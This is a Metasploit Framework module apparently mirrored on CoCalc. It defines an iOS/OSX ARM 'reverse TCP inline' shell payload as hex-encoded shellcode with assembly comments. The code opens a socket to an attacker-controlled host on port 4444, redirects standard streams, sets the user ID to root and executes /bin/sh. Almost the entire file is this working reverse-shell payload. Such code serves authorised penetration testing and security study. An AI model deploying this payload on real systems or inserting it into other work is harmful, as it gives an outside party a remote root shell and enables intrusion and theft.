CoCalc -- shell_reverse

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb
¹⁹⁸⁵¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 152
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Osx
11
  include Msf::Sessions::CommandShellOptions
12

13
  def initialize(info = {})
14
    super(
15
      merge_info(
16
        info,
17
        'Name' => 'Apple iOS Command Shell, Reverse TCP Inline',
18
        'Description' => 'Connect back to attacker and spawn a command shell',
19
        'Author' => 'hdm',
20
        'License' => MSF_LICENSE,
21
        'Platform' => 'osx',
22
        'Arch' => ARCH_ARMLE,
23
        'Handler' => Msf::Handler::ReverseTcp,
24
        'Session' => Msf::Sessions::CommandShellUnix,
25
        'Payload' => {
26
          'Offsets' =>
27
                  {
28
                    'LPORT' => [ 30, 'n' ],
29
                    'LHOST' => [ 32, 'ADDR' ]
30
                  },
31
          'Payload' =>
32
                       [
33
                         # socket
34
                         0xe3a00002, # mov r0, #0x2
35
                         0xe3a01001, # mov r1, #0x1
36
                         0xe3a02006, # mov r2, #0x6
37
                         0xe3a0c061, # mov r12, #0x61
38
                         0xef000080, # swi 128
39
                         0xe1a0a000, # mov r10, r0
40
                         0xeb000001, # bl _konnect
41

42
                         # port 4444
43
                         0x5c110200,
44

45
                         # host 192.168.0.135
46
                         0x8700a8c0,
47

48
                         # connect
49
                         0xe1a0000a, # mov r0, r10
50
                         0xe1a0100e, # mov r1, lr
51
                         0xe3a02010, # mov r2, #0x10
52
                         0xe3a0c062, # mov r12, #0x62
53
                         0xef000080, # swi 128
54

55
                         # setup dup2
56
                         0xe3a05002, # mov r5, #0x2
57

58
                         # dup2
59
                         0xe3a0c05a, # mov r12, #0x5a
60
                         0xe1a0000a, # mov r0, r10
61
                         0xe1a01005, # mov r1, r5
62
                         0xef000080, # swi 128
63
                         0xe2455001, # sub r5, r5, #0x1
64
                         0xe3550000, # cmp r5, #0x0
65
                         0xaafffff8, # bge _dup2
66

67
                         # setreuid(0,0)
68
                         0xe3a00000, # mov r0, #0x0
69
                         0xe3a01000, # mov r1, #0x0
70
                         0xe3a0c07e, # mov r12, #0x7e
71
                         0xef000080, # swi 128
72

73
                         # execve
74
                         0xe0455005, # sub r5, r5, r5
75
                         0xe1a0600d, # mov r6, sp
76
                         0xe24dd020, # sub sp, sp, #0x20
77
                         0xe28f0014, # add r0, pc, #0x14
78
                         0xe4860000, # str r0, [r6], #0
79
                         0xe5865004, # str r5, [r6, #4]
80
                         0xe1a01006, # mov r1, r6
81
                         0xe3a02000, # mov r2, #0x0
82
                         0xe3a0c03b, # mov r12, #0x3b
83
                         0xef000080, # swi 128
84

85
                         # /bin/sh
86
                         0x6e69622f,
87
                         0x0068732f
88
                       ].pack('V*')
89
        }
90
      )
91
    )
92
  end
93
end
94

95
Product

Resources

Company
